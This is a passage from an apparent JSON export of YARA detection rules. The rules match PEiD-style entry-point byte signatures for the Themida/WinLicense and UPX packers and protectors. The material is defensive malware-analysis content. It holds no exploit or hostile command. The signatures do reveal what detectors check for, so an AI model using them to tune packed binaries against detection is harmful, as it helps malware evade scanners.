?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n        $b = { BE ?? ?? BF ?? ?? B9 ?? ?? 56 FC F3 A5 5F E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_18xx_19xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_V2X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n        $c = { 55 8B EC 83 C4 D8 60 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_SignByfly_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V2X_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2065_or_newer_c2009_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 52 BA 64 00 00 00 EB 1B B9 00 10 00 00 EB 05 03 C1 03 C3 49 0B C9 75 F7 52 54 54 FF 15 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2010_v2065_or_newer: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? 00 00 00 CC 58 8B D8 40 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 102,
            "key": "yara_detect_upx",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_UPX",
            "rule": "rule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8D ?? ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC 2E ?? ?? ?? ?? 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 03 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_302: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n        $b = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 99 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 FC 01 00 00 83 CD FF 31 DB EB 0C 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_123_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 33 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B3 01 00 00 EB 0A 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PackerUPX_CompresorGratuito_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE EF 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B1 01 00 00 EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 EB EA EB FC 8A 06 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at 